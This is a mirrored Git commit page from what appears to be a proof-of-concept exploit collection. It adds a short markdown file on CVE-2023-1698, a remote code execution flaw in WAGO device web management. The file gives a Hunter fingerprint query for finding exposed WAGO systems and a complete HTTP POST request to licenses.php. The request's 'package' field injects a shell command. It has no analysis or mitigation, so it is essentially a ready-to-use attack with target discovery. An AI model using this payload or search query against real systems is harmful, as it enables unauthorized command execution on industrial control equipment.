mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create WAGO系统远程代码执行漏洞(CVE-2023-1698).md
This commit is contained in:
parent
c484e84b7c
commit
f771b94dc4
19
WAGO系统远程代码执行漏洞(CVE-2023-1698).md
Normal file
19
WAGO系统远程代码执行漏洞(CVE-2023-1698).md
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
## WAGO系统远程代码执行漏洞(CVE-2023-1698)
|
||||||
|
|
||||||
|
## 鹰图 hunter
|
||||||
|
```
|
||||||
|
web.similar_icon=="10798453453671307224"
|
||||||
|
```
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
|
||||||
|
Host: 127.0.0.0
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
|
||||||
|
Connection: close
|
||||||
|
Content-Length: 19
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
|
||||||
|
{"package":";id;#"}
|
||||||
|
```
|
||||||
|

|
||||||
Loading…
x
Reference in New Issue
Block a user